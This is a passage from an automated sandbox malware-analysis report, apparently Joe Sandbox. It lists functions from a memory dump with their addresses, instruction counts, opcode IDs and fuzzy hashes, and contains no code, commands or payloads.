                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 14bd1707cdaef188a31ffbf8bd517a717896808bd4a0a51617a5523bbcadb428
                                                                                                                                                                                                                      • Instruction ID: a905da5ab7cff00b6a91ebc82784f728404fa582d93a703139b7e520eb99d785
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 14bd1707cdaef188a31ffbf8bd517a717896808bd4a0a51617a5523bbcadb428
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4C419D36D00215DBCB14DF98C840AEEB7B5AF48710F18816FE819E7251DB359D41EBA6
                                                                                                                                                                                                                      Function 00F6EBFC Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 88d3b4bd5030b5f33da9bffed8dfe6ea561891d46830ad7ab86901d797c1ebb0
                                                                                                                                                                                                                      • Instruction ID: 08a06b4e31fedf6cdd969d992cc3f3c250a80582aa9821e487a62b7b691d8974
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 88d3b4bd5030b5f33da9bffed8dfe6ea561891d46830ad7ab86901d797c1ebb0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6741D2B26003019FDB21DF64C880A6BB7E9FF89324F104939E957C7212EB35E848EB50
                                                                                                                                                                                                                      Function 00F82750 Relevance: .1, Instructions: 137COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                                                                                                                      • Instruction ID: 645bd97aed678c4ae41fc61cb1940c2012a3c10cc5bd27297e144b12a64a0e6c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5F513675E00219DFCB14CF99C580AAEF7B2FF85720F2881A9D855A7350D771AE82DB90
                                                                                                                                                                                                                      Function 00F46154 Relevance: .1, Instructions: 133COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: f48dff09cecb42a61e5de8b52c3f2dcddf073310e09b7158ff45c086cac18600
                                                                                                                                                                                                                      • Instruction ID: 238214e92d1894eba7462f9cb0e28c564a9b5fabf791d986e1b90fa4498aa2c6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f48dff09cecb42a61e5de8b52c3f2dcddf073310e09b7158ff45c086cac18600
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 895118B1D00116EBDB25CB64CC01BE8BBB5EF06324F1442A5E915E72C2DB795E81EF41
                                                                                                                                                                                                                      Function 00F40BCD Relevance: .1, Instructions: 130COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 89d586b032f618dfd5eab23a269f4aca02910d70e3e4098c70dc2a06ab1cfa33
                                                                                                                                                                                                                      • Instruction ID: bbfd7127483fe89640302ee4f67c784184137b1511e1cb95599b6644102ef92e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 89d586b032f618dfd5eab23a269f4aca02910d70e3e4098c70dc2a06ab1cfa33
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3A416171E00228DBDF21DF64CD81BEA77B4AF45750F0501A6EA08AB241DB78DE84EB91
                                                                                                                                                                                                                      Function 0100866E Relevance: .1, Instructions: 129COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                                                                                                                      • Instruction ID: 7395f4c73ce2d37d2fd41e9917fd888dd4b702e9eceed74995d5fedaa11ccad3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4141A775F00215ABEB16DB99CC85AAFBBBABF88300F15806AE945A7385D670DD00CB50
                                                                                                                                                                                                                      Function 00F40887 Relevance: .1, Instructions: 128COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: df3da84d3ba86d5ded010ca8d9a893d8643af866eb8ed75db0b26ce1228881dc
                                                                                                                                                                                                                      • Instruction ID: e86bec8fef44a48f7feaec8b5e950678747c9b1898cd3ccd1fcb31345046a8cd
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: df3da84d3ba86d5ded010ca8d9a893d8643af866eb8ed75db0b26ce1228881dc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1441D4716007019FE724DF24C980A26BBF9FF49314B104A6DEA4787B52EB35F849EB90
                                                                                                                                                                                                                      Function 00F6A470 Relevance: .1, Instructions: 127COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: d478394233d78fac926ae134731a079aea17c4c777666a4bd846d1d26e512c86
                                                                                                                                                                                                                      • Instruction ID: 216658ff8fb7688669db668953012b53232182b528ee1ce9808c7de1243f5c7f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d478394233d78fac926ae134731a079aea17c4c777666a4bd846d1d26e512c86
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ED41AC72A40214CFCB21DF68D8957AE77B4BB09360F180196E412BB395DB39AD00EFA1
                                                                                                                                                                                                                      Function 00F48BF0 Relevance: .1, Instructions: 124COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 81d4be35a23007be72b62ad0b1ae04f741b03e3b64b4f9f7e633fc192f8147ce
                                                                                                                                                                                                                      • Instruction ID: d147066bdac0649eee5f8cafe10f6adb746c2a303a98da3841dd947eed397fa5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 81d4be35a23007be72b62ad0b1ae04f741b03e3b64b4f9f7e633fc192f8147ce
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 31410576E01201CFCB24DF48C881B5EBBB5FB85754F248129ED019B246DB7ED842EBA0
                                                                                                                                                                                                                      Function 00F38918 Relevance: .1, Instructions: 123COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 4708945e84261e76b31edeed7a254d5ba664b4d2a321f528f0932b85fbada7eb
                                                                                                                                                                                                                      • Instruction ID: a78da8bc9ae66b627d878366f068091825e0edc0ce8c96f0348a8312fcaef932
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4708945e84261e76b31edeed7a254d5ba664b4d2a321f528f0932b85fbada7eb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D0419F325097169FE711DF64D941B6BB7E8EF84BA4F00092AF980D7250EB34DE05AB93
                                                                                                                                                                                                                      Function 00F3A020 Relevance: .1, Instructions: 122COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                                                                                                                      • Instruction ID: 8459817811bede284ae99fcd662b508284d524c59caaf873417639deca1b501e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 01414C72E00211DBEF14DFA699447BAB771EF90778F25806AE9858B240D7358D40FB92
                                                                                                                                                                                                                      Function 00F409AD Relevance: .1, Instructions: 122COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: fd85f280537840f3f97f0a2f53ab61e892b9fb97b1371e305e6bcf5f7b574aa0
                                                                                                                                                                                                                      • Instruction ID: 820646aa8b574fbe88dc1ed2d9cccdc0e3f86723c82a700f4ef61e05993aaa6b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fd85f280537840f3f97f0a2f53ab61e892b9fb97b1371e305e6bcf5f7b574aa0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 01417D71A00700EFD721DF18D841B26BBE5FF44724F24892AE949CB252EB75ED42EB90
                                                                                                                                                                                                                      Function 00F70710 Relevance: .1, Instructions: 121COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                                                                                                                      • Instruction ID: 8e0b0af71cb6a06c3dc476d0e7c09a7a800959c2181138d95a4c2363927cb5b7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 00413B71A00605EFCB24CF98C980AAAB7F4FF08710B20896EE55AD7691D730FA45EF51
                                                                                                                                                                                                                      Function 00F4262C Relevance: .1, Instructions: 119COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 3451bca37cc1966bad209fc1119f0a7c4b580999d9380b01a3b2f4edaacee23e
                                                                                                                                                                                                                      • Instruction ID: 6c4f02f3eb152dffca625ebabf20d8f089806ab23bd0ad689bb4014a217983ff
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3451bca37cc1966bad209fc1119f0a7c4b580999d9380b01a3b2f4edaacee23e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5841E471901700DFCB61EF24C901765BBF5FF89320F5182B9E8469B2A1DB349A41EF51
                                                                                                                                                                                                                      Function 00F7C8F9 Relevance: .1, Instructions: 116COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 9c2ce745b256ec0b0ba23a937f06d4fc9812fa375a9c515b0c6afc4062538c51
                                                                                                                                                                                                                      • Instruction ID: c5a66c559a98ea98a04c70a4eefc647810be8703c1ee4e9d8ccd2ccb43105e78
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9c2ce745b256ec0b0ba23a937f06d4fc9812fa375a9c515b0c6afc4062538c51
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 113199B2A00345DFDB51DF58C440799BBF4EB49724F2085AEE109EB251D73AD902DF90
                                                                                                                                                                                                                      Function 00F380A0 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 9e442b64cc7ab31461008c8e7915daa40fd6282e344b6467a7a618435d48d4fa
                                                                                                                                                                                                                      • Instruction ID: 0bcabdcb895346f281c4313388bab4dc7e0632a8ab71d88bd2a7e46db63d5dcb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e442b64cc7ab31461008c8e7915daa40fd6282e344b6467a7a618435d48d4fa
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F41C072E05715AFDB10EF14CD416A9B7B1BB447B0F248229F815A7290DB38ED43ABD0
                                                                                                                                                                                                                      Function 00FC05A7 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 18ba0b6fb05ff75775558025a71028077587b8b9e9506d2af53c7689a810a9ef
                                                                                                                                                                                                                      • Instruction ID: b6c86b8a95ffe78d23a55bf93933d8c82d49765cf171d90e9fd7fec9b5bee16c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 18ba0b6fb05ff75775558025a71028077587b8b9e9506d2af53c7689a810a9ef
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9241C372504652DFC320DF68C942F6AB3E9AFC8710F14062DF89597680EB34ED15E7A5
                                                                                                                                                                                                                      Function 00F44859 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 2270b82f8e03f408782c93c409dd5da2ccfb69497766dbea6add2869badcac6f
                                                                                                                                                                                                                      • Instruction ID: 87a8265c9c416e710c8203625d46c7e93d91a5f911d49afdb683f80036b79439
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2270b82f8e03f408782c93c409dd5da2ccfb69497766dbea6add2869badcac6f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0341D331A003018BD725DF28D884B2BBBE9EF81360F14442DFD95AB291DB35ED45EB51
                                                                                                                                                                                                                      Function 00F38B50 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 6193d98b02bcfa90f7ada5887cf59bdc1c80961b3ab4e30829b3f6debb84bebd
                                                                                                                                                                                                                      • Instruction ID: 3c71b70b68ba2ac407e1e2fd78b13abe0cb65897d704ba0b2987a69ba22ad36f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6193d98b02bcfa90f7ada5887cf59bdc1c80961b3ab4e30829b3f6debb84bebd
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2B417272E01705CFCB14DF69C98059DB7F1FF883B0F24852AE466A7251DB389942EB50
                                                                                                                                                                                                                      Function 00F502E1 Relevance: .1, Instructions: 106COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                      • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                                                                                                                                      • Instruction ID: 5ebfc68d085705b858c5d6556204f175b1d75201297aa7d2c79096f17b5e33c0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D1312632A01244AFDB118B68CC44B9ABFE9AF04360F0441A5FC19D7352C6B89988EBA4
                                                                                                                                                                                                                      Function 00FEE3DB Relevance: .1, Instructions: 105COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 4ab3ba75a1acb4842ea57913670bb3cae6538d47c31ad2cda12036ccf3b9eaa8
                                                                                                                                                                                                                      • Instruction ID: 1e464daffff036c7375bfb95813bdeb34bff3cff3809d0ee8074d72a1a04b87c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4ab3ba75a1acb4842ea57913670bb3cae6538d47c31ad2cda12036ccf3b9eaa8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A631C635750755ABD722EF659C42FAB76A9AF48B50F100028FA00BB2D1DAA8DD00E7A0
                                                                                                                                                                                                                      Function 00FF4B4B Relevance: .1, Instructions: 104COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 8bf68aff4fb272cf82b1b8f0af38b64314d6ee66745d5db172824b008b996603
                                                                                                                                                                                                                      • Instruction ID: fc96a7223fa6144bbf55a3b337833a51a23ce56acff0ff27344c6c77df4719e7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8bf68aff4fb272cf82b1b8f0af38b64314d6ee66745d5db172824b008b996603
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BC31C332A052049FC720DF19D880E76B7E9FF81360F06446DEA959B262D732FD05EB95
                                                                                                                                                                                                                      Function 00F44260 Relevance: .1, Instructions: 102COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 300dda2dd425884891b9c629a2c3007fbd4290a7714b83cbbd793f21040fccec
                                                                                                                                                                                                                      • Instruction ID: c0466afb8c37482139b72c6d673916c47a9e0c6f22a2f4f8ea5d31d098b0b138
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 300dda2dd425884891b9c629a2c3007fbd4290a7714b83cbbd793f21040fccec
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5A41DF72500B45DFC722CF28C885FEA7BE8BF4A750F108429E9999B251CB74F844EB50
                                                                                                                                                                                                                      Function 00FF4BB0 Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 576bfd58e467c6258a79779f08d03063bcff077516a65ba4f931b72c3c5fe8d6
                                                                                                                                                                                                                      • Instruction ID: 2aaae46b6ce7d1aa7bca5a9329e84dff4c2f34a98b70f060dd80eb29f6fbdb5b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 576bfd58e467c6258a79779f08d03063bcff077516a65ba4f931b72c3c5fe8d6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C0319C71A052059FC720DF29C881A3BB3E5FF84720F05456DFA999B2A1E730ED04EBA1
                                                                                                                                                                                                                      Function 010061C3 Relevance: .1, Instructions: 97COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 2fa19e7f80ed4d7748fa3613e4b04603fd921f915a8cc88852cd2416417796af
                                                                                                                                                                                                                      • Instruction ID: e3a941aa332b7098b6c228500f029129e771538c6cff5dc897cd2af0f27e1e00
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2fa19e7f80ed4d7748fa3613e4b04603fd921f915a8cc88852cd2416417796af
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7310475A00616ABEB16DF98CC41FAEB7B6FB44B40F014168F940AB281D770ED00CBA0
